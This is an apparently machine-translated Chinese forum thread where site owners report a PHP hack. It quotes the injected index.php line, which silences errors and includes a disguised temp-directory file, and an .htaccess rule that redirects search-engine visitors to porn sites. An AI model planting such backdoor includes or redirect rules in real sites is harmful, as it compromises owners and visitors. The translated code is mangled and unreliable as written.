提问者:小点点

PHP代码注入Index.php


我有一个php项目,我看到index.php页面不断被黑客攻击

每次在索引顶部自动添加一些代码。每当我点击任何地方,php页面和我的网站都会被重定向到第三方url。

注入的代码如下:

错误报告(0);ini_集(“显示错误”,0);包含一次(系统获取临时目录()。“/SESS48CD7517D21176F980DAA5502D9EFB31”)


共2个答案

匿名用户

我认为它包含在会话文件中。检查SESS48CD7517D21176F980DAA5502D9EFB31文件包含的内容。

匿名用户

我也有同样的问题。

全部索引。PHP文件被注入了完全相同的代码。

等等。htaccess文件由以下人员插入:

<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]
</IfModule>

点击谷歌搜索结果中的链接将被重定向到色情网站。